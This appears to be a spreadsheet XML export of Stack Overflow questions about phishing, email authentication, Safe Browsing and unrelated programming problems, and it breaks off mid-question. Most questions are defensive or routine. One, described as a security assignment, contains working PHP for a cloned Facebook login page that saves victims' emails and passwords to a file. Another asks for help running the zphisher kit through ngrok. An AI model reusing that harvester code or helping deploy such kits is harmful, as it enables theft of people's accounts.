 &lt;p&gt;&lt;strong&gt;This works&lt;/strong&gt; as designed. So if I add a phishing site like &lt;code&gt;thisisevil.com&lt;/code&gt; the api-call returns a warning. &lt;/p&gt;
 &lt;p&gt;But if someone uses an url shortener like &lt;code&gt;tny.sh/abcefg&lt;/code&gt; which then redirects to &lt;code&gt;thisisevil.com&lt;/code&gt; the safebrowsing-api does &lt;em&gt;not&lt;/em&gt; show me there is a threat.&lt;/p&gt;
 &lt;p&gt;Is there a way to tell the secure browsing api to follow redirects?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;google-api&gt;&lt;safe-browsing-api&gt;</t>
  </si>
  <si>
    <t>AWS SES emails to Gmail accounts flagged as phishing and delayed by 4 minutes</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm using AWS SES in a Lambda function to send emails. When the email is sent to an Outlook address, or without an attachment to a Gmail address, it is received immediately.&lt;/p&gt;
 &lt;p&gt;However, when I send an email containing an attachment (in our case an Excel file), the emails are received almost exactly 4 minutes late every time.&lt;/p&gt;
 &lt;p&gt;I believe that Gmail is flagging our emails with attachments as phishing attempts, as mentioned &lt;a href="https://gsuiteupdates.googleblog.com/2017/05/early-detection-of-phishing-via-delayed-delivery.html" rel="nofollow noreferrer"&gt;in this post&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;I have enabled SPF, DKIM and DMARC for my domain. Any idea what else I could try to fix this?&lt;/p&gt;
 &lt;p&gt;This is what our emails look like:
 &lt;a href="https://i.stack.imgur.com/Q6WoM.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/Q6WoM.png" alt="delayed email screenshot" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Update: This only happens with Excel files. When I send this as a csv file, it is sent immediately.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;aws-lambda&gt;&lt;gmail&gt;&lt;amazon-ses&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is the mail containing a URL with protocol type "notes://" a phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have got an e-mail with a link looking like this&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Notes:///3ca313f3fb36d2d482812e7fd8321707f5d8c92a/87c0c154910a8c6cabb25d7567197027847c201a
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Is this a phishing? What application utilizes links like this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>how do I fix ngrok invalid HTTP response error</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using zphisher. when i create a link to ngrok, the link is generated, but on opening it it says &lt;code&gt;ngrok gateway error The server returned an invalid or incomplete HTTP response.&lt;/code&gt; I got to know from ngrok error documentation that it is error 3004. they tell the error code and message but no possible way to fix the error. can someone help me please. I think my brother watches YouTube during his online classes and I want to conform it. No phishing. Please. I got absolutely no help from anywhere. Just one of my friend told me that i need an ngrok account for that. tried it, doesn't work.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ngrok&gt;</t>
  </si>
  <si>
    <t>while Extracting the features &amp; storing them in a list error is occurring</t>
  </si>
  <si>
    <t>&lt;p&gt;gaierror Traceback (most recent call last)
 File C:\ProgramData\anaconda3\lib\urllib\request.py:1348, in AbstractHTTPHandler.do_open(self, http_class, req, **http_conn_args)
 1347 try:
 -&amp;gt; 1348 h.request(req.get_method(), req.selector, req.data, headers,
 1349 encode_chunked=req.has_header('Transfer-encoding'))
 1350 except OSError as err: # timeout error&lt;/p&gt;
 &lt;p&gt;File C:\ProgramData\anaconda3\lib\http\client.py:1282, in HTTPConnection.request(self, method, url, body, headers, encode_chunked)
 1281 &amp;quot;&amp;quot;&amp;quot;Send a complete request to the server.&amp;quot;&amp;quot;&amp;quot;
 -&amp;gt; 1282 self._send_request(method, url, body, headers, encode_chunked)&lt;/p&gt;
 &lt;p&gt;File C:\ProgramData\anaconda3\lib\http\client.py:1328, in HTTPConnection._send_request(self, method, url, body, headers, encode_chunked)
 1327 body = _encode(body, 'body')
 -&amp;gt; 1328 self.endheaders(body, encode_chunked=encode_chunked)&lt;/p&gt;
 &lt;p&gt;File C:\ProgramData\anaconda3\lib\http\client.py:1277, in HTTPConnection.endheaders(self, message_body, encode_chunked)
 1276 raise CannotSendHeader()
 -&amp;gt; 1277 self._send_output(message_body, encode_chunked=encode_chunked)&lt;/p&gt;
 &lt;p&gt;File C:\ProgramData\anaconda3\lib\http\client.py:1037, in HTTPConnection._send_output(self, message_body, encode_chunked)
 1036 del self._buffer[:]
 -&amp;gt; 1037 self.send(msg)
 1039 if message_body is not None:
 1040
 1041 # create a consistent interface to message_body&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;machine-learning&gt;&lt;dataset&gt;&lt;urllib&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Facebook phishing detection</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm doing a little assignment on computer security and I'm currently working on phishing.&lt;/p&gt;
 &lt;p&gt;So for educational purposes I wrote a simplist "phishing webpage" and I'm trying to understand how Facebook detects phishing fraudulent webpages. &lt;/p&gt;
 &lt;p&gt;My &lt;code&gt;index.html&lt;/code&gt; is the facebook main page while I edited it in order to redirect the user to a &lt;code&gt;phishing.php&lt;/code&gt; page.&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;phishing.php&lt;/code&gt;:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
 $file = fopen('phishing.txt', 'a');
 fwrite($file, 'M: '.htmlspecialchars($_POST['email'])."\nP: ".htmlspecialchars($_POST['pass'])."\n\n");
 fclose($file);
 ?&amp;gt;
 &amp;lt;form action="https://www.facebook.com/login.php?login_attempt=1" method="post" name="frm"&amp;gt;
 &amp;lt;?php
  foreach ($_POST as $a =&amp;gt; $b) {
  echo "&amp;lt;input type='hidden' name='".htmlentities($a)."' value='".htmlentities($b)."'&amp;gt;";
  }
 ?&amp;gt;
 &amp;lt;/form&amp;gt;
 &amp;lt;script language="JavaScript"&amp;gt;
  document.frm.submit();
 &amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;My question comes here. Everything works well, excepted the fact that once the user (me) enters is username and password, Facebook says: &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Security Notice:&lt;/strong&gt; For your security, never enter your Facebook password
  on sites not located on Facebook.com&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;So which mechanism is used by Facebook in order to detect phishing pages like this?&lt;/p&gt;
 &lt;p&gt;Thanks!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;facebook&gt;&lt;http&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Best practices in dealing with the abuse of custom URL scheme to make phishing attack ios</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;The Scenario:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;A web application that once a new user completes the registration, an email will be sent, containing a URL that once tapped from within an iOS device, the iOS app will be launched. This scenario is a classic scenario to make users use the mobile app.&lt;/p&gt;
 &lt;p&gt;While implementing it (using URL scheme), we start wondering how secured is this method? Theoretically - a malicious app could sign up to the same URL scheme, and according to Apple:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Note: If more than one third-party app registers to handle the same URL scheme, there is currently no process for determining which app will be given that scheme.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;a href="https://developer.apple.com/library/ios/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW10"&gt;Implementing Custom URL Schemes by Apple&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;In such scenario, if a user is tapping the url inside the email, it is unknown which of the two (or more apps) will be launched - ours or the malicious one. Lets say a different app is being launched - if its really malicious, theoretically it could mimic the login page of our app and grab the user's credentials.&lt;/p&gt;
 &lt;p&gt;Are there any best practices that handles such scenario? I've read many articles regarding the issue, all of them claims that the only solution is to wait for Apple to make these url schemes unique.
 &lt;a href="http://erik.io/blog/2014/04/14/phishing-out-ios-url-schemes/"&gt;example1&lt;/a&gt;,
 &lt;a href="https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html"&gt;example2&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I would love hearing about any solution to the issue if exist,
 Thanks in advance!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ios&gt;&lt;security&gt;&lt;url-scheme&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>I am retrieving items from a list and want only 4 to show on my page</t>
  </si>
  <si>
    <t>&lt;p&gt;I am retrieving items from a list, which has 5 items, but I only want 4 to show and every time I add a new item I want the new item to show first and then the other 3 items to follow and the fifth item must not show.&lt;/p&gt;
 &lt;p&gt;I have tried .last(), hide() but none of them help me accomplish what I want&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;div id="phishing" class="row"&amp;gt;
 &amp;lt;!--Injected content--&amp;gt;
 &amp;lt;/div&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;pre&gt;&lt;code&gt;$.ajax({
  url: "/cyberSecurity/_api/web/lists/GetByTitle('phishingExamples')/items",
  method: 'GET',
  headers: {
  'Accept': 'application/json; odata=verbose'
  },
  success: function(data) {
  var items = data.d.results;
  var phishing = $('#phishing');
  var phishingCards;
  for (var i = 0; i &amp;lt;4; i++) {
  phishingCards = '&amp;lt;div class="col-sm-6 col-md-6 col-lg-3 mb-3"&amp;gt;' +
  '&amp;lt;div style="background-color: #004685; height: 340px; position: relative;" class="card backImg2 "&amp;gt;' +
  '&amp;lt;div style="color: #fff;" class="card-body "&amp;gt;' + 
  '&amp;lt;h5 style="color: #ffe01a;" class="card-title "&amp;gt;' + items[i].Title + '&amp;lt;/h5&amp;gt;' +
  '&amp;lt;p style="margin-bottom: -5px;" class="card-text "&amp;gt;' + items[i].Description + '&amp;lt;/p&amp;gt;' +
  '&amp;lt;div style="width: 100%; margin: 0 auto; position: absolute; bottom: 0;right: 0" class="row "&amp;gt;&amp;lt;a style=" background-color: #ffe01a!important; color: black!important; border: none; width: 100%;" href= "'+ items[i].Image.Url +'"class="btn btn-primary btn-sm" target=_blank&amp;gt;More Info&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;' +
  '&amp;lt;/div&amp;gt;' +
  '&amp;lt;/div&amp;gt;' +
  '&amp;lt;/div&amp;gt;'; 
  phishing.prepend(phishingCards);
  }
  },
  error: function(data) {
  console.log('Error: ' + data);
  }
  }); // End Service Icons //End Service Icons
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I expect to show only 4 items on the page even if there is more than 4 items. I also want the new item to show first.&lt;/p&gt;
 &lt;p&gt;I actually get the new items first when I changed the loop to items.length but I only want to show 4 items.
 &lt;a href="https://i.stack.imgur.com/d5Tul.jpg" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;jquery&gt;&lt;html&gt;</t>
  </si>
  <si>
    <t>spoofing e phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I created a small web application to send emails. &lt;/p&gt;
 &lt;p&gt;when i send an email Hotmail considers it as spoofing e phishing&lt;/p&gt;
 &lt;p&gt;how can i sort this problem?&lt;/p&gt;
 &lt;p&gt;thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spoofing&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>iOS Safari suggests "phishing" when passing username:password to @url</t>
  </si>
  <si>
    <t>&lt;p&gt;Passing a username and a password for &lt;strong&gt;Basic Authentication&lt;/strong&gt; is comfortable; But not if iOS Safari tells me to stay away from my website every time.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Example URL&lt;/strong&gt;&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://bytecode77:123456@example-subdomain.bytecode77.com" rel="nofollow noreferrer"&gt;http://bytecode77:123456@example-subdomain.bytecode77.com&lt;/a&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Is there anything I can change in my code or webserver configuration to avoid such suspiciousness?&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/ShRax.png" alt="phishing warning"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;basic-authentication&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>List of bank domains to stop phish</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm looking for a full list of bank domain names to include in an anti-phish routine I'm planning, does anyone have a list/URL?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email-spam&gt;&lt;phishing&gt;&lt;spamassassin&gt;&lt;spam-prevention&gt;</t>
  </si>
  <si>
    <t>Options to report and view a possible phishing script hosted under scripts.google.com</t>
  </si>
  <si>
    <t>&lt;p&gt;Received an email from someone claiming to be Amazon support that links to a script.google.com/macros page. I visiting it on Android without realizing what it was and wanted to see if there was a place to report the script and view what information it gathered.&lt;/p&gt;
 &lt;p&gt;I spent a good 30 minutes trying to find a place in google to get support on this issue and could not find any other than asking technical support here so I figured I would try making a post.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to correct a misconfigured spf record to stop sending phishing or spam emails from our domain by attacker?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got this email recently that speaks about vulnerability issue with our email because of misconfigured spf record. Please find below the actual email.&lt;/p&gt;
 &lt;p&gt;Is this really an issue? How to address the issue?&lt;/p&gt;
 &lt;p&gt;Please help someone.
 Thanks&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;This report is about a misconfigured spf record flag , which can be used to abuse the organization by posing the identity , which allows for fake mailing on behalf of respected organizations .&lt;/p&gt;
 &lt;p&gt;About the Issue :
 As i seen the SPF and TXT record for your site which is :
 v=spf1 mx ~all&lt;br /&gt;
 as u can see the symbol at last which Tilde (~all) is the issue , which should be replaced by Hyphen (-all) symbol.&lt;/p&gt;
 &lt;p&gt;So valid record will be look like :
 v=spf1 mx -all&lt;/p&gt;
 &lt;p&gt;What's the issue :
 As you can see in the article difference between Softmail and fail you should be using fail as Softmail allows anyone to send spoofed emails from your domains.&lt;/p&gt;
 &lt;p&gt;In the current SPF record you should replace ~ with - at last before all , - is strict which prevents all spoofed emails except if you are sending.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;We checked with our hosting and he said there is no issue and nothing to fix. But we are puzzled with this email and yes, we receive emails from our own domain and definitely its an issue, if someone sends such random emails to others through our domain.&lt;/p&gt;
 &lt;p&gt;So I want to know if the email I received is describing an actual issue? How to address the issue?&lt;/p&gt;
 &lt;p&gt;Please help.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;security&gt;&lt;spf&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Running Playwright .NET in Azure Function (Windows)</t>
  </si>
  <si>
    <t>&lt;p&gt;I am not able to run azure function which calls the playwright test after I publish it to the Azure cloud.&lt;/p&gt;
 &lt;p&gt;The exception is following&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; Playwright Test or Playwright was just installed or updated. 
 ‚ïë ‚ïë Please run the following command to download new browsers: ‚ïë ‚ïë 
 ‚ïë ‚ïë playwright install ‚ïë ‚ïë 
 ‚ïë ‚ïë &amp;lt;3 Playwright Team ‚ïë
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The issue is that I don't know how to run &lt;code&gt;playwright install&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;There is some &lt;a href="https://learn.microsoft.com/en-us/azure/azure-functions/functions-deployment-technologies#remote-build" rel="nofollow noreferrer"&gt;remote build possibility&lt;/a&gt;, but the documentation does not contains details.&lt;/p&gt;
 &lt;p&gt;So I tried following&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Copy chrome browser &lt;code&gt;%USERPROFILE%\AppData\Local\ms-playwright\chrome-win&lt;/code&gt; into the project folder.&lt;/li&gt;
 &lt;li&gt;Attach chrome-win folder into the project.&lt;/li&gt;
 &lt;li&gt;Update &lt;code&gt;.csproj&lt;/code&gt; so the chrome browser will be in output directory and output zip&lt;/li&gt;
 &lt;/ol&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;ItemGroup&amp;gt;
  &amp;lt;Content Include=&amp;quot;chrome-win\**&amp;quot;&amp;gt;
  &amp;lt;CopyToOutputDirectory&amp;gt;PreserveNewest&amp;lt;/CopyToOutputDirectory&amp;gt;
  &amp;lt;/Content&amp;gt;
 &amp;lt;/ItemGroup&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;ol start="4"&gt;
 &lt;li&gt;Update executable path in playwright&lt;/li&gt;
 &lt;/ol&gt;
 &lt;pre&gt;&lt;code&gt;await using var browser = await playwright.Chromium.LaunchAsync(new() { ExecutablePath = &amp;quot;chrome-win/chrome.exe&amp;quot;});
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Locally, it is working fine. Zip Deploy to Azure is also successful. But when the Azure function is triggered, it throws some unknown exception&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Result: Failure Exception: System.AggregateException: One or more errors occurred. (spawn UNKNOWN =========================== logs =========================== &amp;lt;launching&amp;gt; chrome-win/chrome.exe --disable-background-networking --enable-features=NetworkService,NetworkServiceInProcess --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-component-extensions-with-background-pages --disable-default-apps --disable-dev-shm-usage --disable-extensions --disable-features=ImprovedCookieControls,LazyFrameLoading,GlobalMediaControls,DestroyProfileOnBrowserClose,MediaRouter --allow-pre-commit-input --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --no-service-autorun --user-data-dir=C:\local\Temp\playwright_chromiumdev_profile-rw44Ph --remote-debugging-pipe --headless --hide-scrollbars --mute-audio --blink-settings=primaryHoverType=2,availableHoverTypes=2,primaryPointerType=4,availablePointerTypes=4 --no-sandbox --no-startup-window ============================================================) ---&amp;gt; Microsoft.Playwright.PlaywrightException: spawn UNKNOWN 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I just don't want to believe that I have to rewrite everything into JavaScript because of one line command in the terminal üò•&lt;/p&gt;
 &lt;p&gt;Is it possible to switch to Linux OS with functions written in .NET and use browser installed via &lt;code&gt;npm install playwright&lt;/code&gt;? The .NET is cross platform now, so it might work?&lt;/p&gt;
 &lt;p&gt;Has anyone managed to get this up and running?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;azure-functions&gt;&lt;playwright&gt;</t>
  </si>
  <si>
    <t>Is there a place to get more granular reporting data via API?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm trying to figure out a way to export some of the events I can see in the security dashboard and alert center. The Customer Reports API only gives me the # of mail received per day, and # or spam messages per day, but is more than 24 hrs behind. &lt;/p&gt;
 &lt;p&gt;I've tried to create an alert in the security alerts center for whenever my domain gets a relevant email, but I just get an email once a minute that says the the threshold was exceeded, and I have to click into the investigation tool to actually get the relevant data.&lt;/p&gt;
 &lt;p&gt;Is there a place I can request # of phishing emails per hour, or be alerted whenever new phishing emails are found. Or Malware, etc. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;reporting&gt;&lt;google-admin-sdk&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is 5-digit PIN better than most passwords?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is something that's been bugging me for many years: why most online services &lt;strong&gt;highly value the entropy of a password&lt;/strong&gt;, citing it as a security measure, and enforcing it when users select a password?&lt;/p&gt;
 &lt;p&gt;I decided to come out with this question after reading the paper &lt;a href="http://research.microsoft.com/pubs/70445/tr-2007-64.pdf" rel="noreferrer"&gt;"Do Strong Web Passwords Accomplish Anything?"&lt;/a&gt; (and, of course, &lt;a href="http://www.dilbert.com/strips/comic/2005-09-10/" rel="noreferrer"&gt;classic Dilbert cartoon&lt;/a&gt;).&lt;/p&gt;
 &lt;p&gt;The typical policy of an online site is to require at least 6 or 8-digit upper+lowercase+numeric password. This length is somewhat relevant for the difficulty of brute-force attack to e.g. recover a password from hash. But the typical way guessing happens online is that somebody tries to log in into the server, which is free to refuse after a couple of attempts. &lt;/p&gt;
 &lt;p&gt;Let's imagine, for example, that we are protecting some medium-sized service with an all-digit PIN. 
 One immediately thinks about 4-digit or 6-digit pins, but that might be not a good idea as too many people will be tempted to enter their children's birthdays, which are essentially a public knowledge. &lt;/p&gt;
 &lt;p&gt;So, here's my &lt;strong&gt;5-digit PIN&lt;/strong&gt; suggestion. I keep for each user a "possible attack" flag.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;User logs in correctly -&gt; OK&lt;/li&gt;
 &lt;li&gt;Otherwise, keep the https session and allow 2 more tries&lt;/li&gt;
 &lt;li&gt;User logs in -&gt; OK&lt;/li&gt;
 &lt;li&gt;Otherwise, allow 2 more tries with a 5-minute break before them&lt;/li&gt;
 &lt;li&gt;User logs in -&gt; OK&lt;/li&gt;
 &lt;li&gt;User breaks session -&gt; set the flag &lt;/li&gt;
 &lt;li&gt;User breaks session but logs in normally later: present user with the dialog and allow to clear the flag&lt;/li&gt;
 &lt;li&gt;User exhausts the tries above: send email with the link; allow to clear the flag&lt;/li&gt;
 &lt;li&gt;If there are more than 100 flags overall during the month, set the global "possible attack" flag which requires that people who don't have a cookie answer security questions&lt;/li&gt;
 &lt;li&gt;Automatically clear the user flag in some cases (e.g. user finally logged in from the same computer)&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Let's assume that the user names are somehow known (note this won't be true for most sites). A brute-force attack against one user is hopeless -- you're locked out after 5 attempts, so you have a 1/200000 chance. If you try to guess password more than 200 times in a month, the flag goes off and you get nothing. If you try &amp;lt;200 users per month, after a year you have &amp;lt; 1% chance of breaking one user; you're much better off with phishing, viruses, social engineering or anything else.&lt;/p&gt;
 &lt;p&gt;The size of the site is relevant only in the sense of not getting false positives, that is users who genuinely forget their password (let's say 1% per month), recover it, but don't clear the flag (let's say 1% of those), and when you can't clear the flag automatically (say, 10% of those). This makes for 10 expected false positive flags per month per 10&lt;sup&gt;6&lt;/sup&gt; users --- which means that a medium-sized site has a reasonably low probability of entering "panic" mode, which anyway isn't that bad.&lt;/p&gt;
 &lt;p&gt;I believe that this scheme is very practical. Here are some obvious first facts about it &lt;em&gt;(updates)&lt;/em&gt;:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;strong&gt;benefit&lt;/strong&gt;: The PIN is easier to remember. I believe this is a big benefit since it's now possible to require that user remembers the password you generated. I believe most people are much better remembering 5 random digits than any other type of random password. &lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;tradeoff&lt;/strong&gt;: Hashing will not help much if your attacker knows both the hashed PIN and the salt. This is possible if somebody broke into your database &lt;em&gt;and&lt;/em&gt; learns what's your salting process. However, I believe the standard password entropy doesn't help in that case either. &lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;benefit&lt;/strong&gt;: people are much happier remembering random 5 digits than random alphanumeric passwords; therefore it's much easier to also require that we generate the password, not the user. This eliminates dictionary/personal data attacks.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;My questions are:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;What are the other tradeoffs/benefits of my scheme compared to the one I described as typical?&lt;/li&gt;
 &lt;li&gt;Won't be most medium-sized sites and organizations better with my password scheme?&lt;/li&gt;
 &lt;li&gt;What are the reasons they select the scheme they have?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: I don't advocate always having short passwords. My own web passwords are usually randomly generated and encrypted by a password manager (&lt;code&gt;1Password&lt;/code&gt;) with 12-character high entropy password. But I think that often the scheme above would be better than what we have in practice.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-services&gt;&lt;security&gt;&lt;authentication&gt;&lt;passwords&gt;</t>
  </si>
  <si>
    <t>How to change nested variables inside a dictionary in ansible (jinja2)</t>
  </si>
  <si>
    <t>&lt;p&gt;I am currently trying to use the acme_certificate module from ansible to automatically generate a lets encrypt certificate for my servers. Since my service provider doesn't provide a route53 compatible endpoint I had to write my own python script to upload the DNS record including the challenge. Therefore I need to pass the challenge data (to be specific the challenge string itself) to the python script and I dont know how I can nest variables inside the dictionary in order to access the right element. Any ideas how to solve this problem (I tried to use lookup but ended up with having even more error)?&lt;/p&gt;
 &lt;p&gt;My Playbook:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;---
 - hosts: localhost
  vars:
  dns_name: sample.com
 tasks:
 - name: submit request
  acme_certificate:
  account_key_src: "{{ tmpdir }}{{ account_key }}"
  account_email: cert@{{ dns_name }}
  src: "{{ tmpdir }}{{ csrname }}"
  fullchain_dest: "{{ tmpdir }}{{ certname }}"
  challenge: dns-01
  acme_directory: https://acme-staging-v02.api.letsencrypt.org/directory
  acme_version: 2
  terms_agreed: yes
  remaining_days: 60
  register: challenge
 - name: publish challenge as TXT record
  shell: "python3 /tmp/publish_dns.py --dns_name {{ dns_name }} {{ challenge.challenge_data['*.{{ dns_name }}']['dns-01'].resource_value }}"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When I run the playbook I get following error:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;TASK [deploy_phishing : publish challenge as TXT record] 
 ***********************
 fatal: [server1]: FAILED! =&amp;gt; {"msg": "The task includes an option with an undefined variable. The error was: 'dict object' has no attribute '*.{{ dns_name }}'\n\nThe error appears to be in '/var/lib/awx/projects/test/roles/generat_cert/tasks/tasks1.yml': line 76, column 3, but may\nbe elsewhere in the file depending on the exact syntax problem.\n\nThe offending line appears to be:\n\n\n- name: publish challenge as TXT record\n ^ here\n"}
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;variables&gt;&lt;ansible&gt;&lt;jinja2&gt;&lt;ansible-template&gt;</t>
  </si>
  <si>
    <t>Phishing emails are learning what I send?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm getting a lot of Phishing emails very similar to the emails from companies I use. &lt;/p&gt;
 &lt;p&gt;Some of these companies and the emails we exchange are very unique. How would these malicious emails 'learn' the type of emails and content I send?&lt;/p&gt;
 &lt;p&gt;Could they be sniffing out content if so whats the recommended steps to prevent?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email-spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to protect from this (Evilginx)</t>
  </si>
  <si>
    <t>&lt;p&gt;How to protect from this?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://breakdev.org/evilginx-advanced-phishing-with-two-factor-authentication-bypass/" rel="nofollow noreferrer"&gt;https://breakdev.org/evilginx-advanced-phishing-with-two-factor-authentication-bypass/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I have many websites, in many technologies... I need a way to protect.&lt;/p&gt;
 &lt;p&gt;I'm wondering if there is just something like a check of suspicious IP activities in the aftermath?&lt;/p&gt;
 &lt;p&gt;Just this? Really?&lt;/p&gt;
 &lt;p&gt;Can I check my SSL certificate? HSTS? Avoid using nginx from serving my site?&lt;/p&gt;</t>
  </si>
  <si>
    <t>user4412054</t>
  </si>
  <si>
    <t>&lt;cookies&gt;&lt;session-cookies&gt;&lt;password-protection&gt;&lt;csrf-protection&gt;</t>
  </si>
  <si>
    <t>Trying to POST API command in Python Google Webrisk but cant figure out the authentication</t>
  </si>
  <si>
    <t>&lt;p&gt;here is the guide from Google: &lt;a href="https://cloud.google.com/web-risk/docs/submission-api-v2#curl" rel="nofollow noreferrer"&gt;https://cloud.google.com/web-risk/docs/submission-api-v2#curl&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;To be honest it is not very clear, or im being especially slow . so i know typically for APIs, you pass a key and secret like &lt;code&gt;s.auth = (auth_key, auth_secret)&lt;/code&gt; assuming you defined auth_key etc.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;However, for the webrisk one, i cannot figure out what the API command would be, i got this far:
 g_head = {&amp;quot;key&amp;quot;: &amp;quot;KEYIGOTFROMGOOGLEHERE&amp;quot;}
 google_post = s.post('https://webrisk.googleapis.com/v1/projects/phishing-project-NUMBER/uris:submit',headers=g_head, verify=False, json={
  &amp;quot;submission&amp;quot;: {
  &amp;quot;uri&amp;quot;: &amp;quot;http://BADDOMAIN.com&amp;quot;,
  },
 })
 google_submit_response = google_post.json()
 print(google_submit_response)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;i keep getting errors of &amp;quot;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;request is missing required authentication credential. Expected OAuth
 2 access token, login cookie or other valid authentication credential.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&amp;quot;&lt;/p&gt;
 &lt;p&gt;I did download a json file from Google API account that contains the following if that useful (although i am not sure where and how to use it in the code):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;quot;type&amp;quot;: &amp;quot;service_account&amp;quot;
 &amp;quot;project_id&amp;quot;: &amp;quot;XXXXXXXX&amp;quot;
 &amp;quot;private_key_id&amp;quot;: &amp;quot;XXXXX&amp;quot;
 &amp;quot;private_key&amp;quot;: &amp;quot;-----BEG
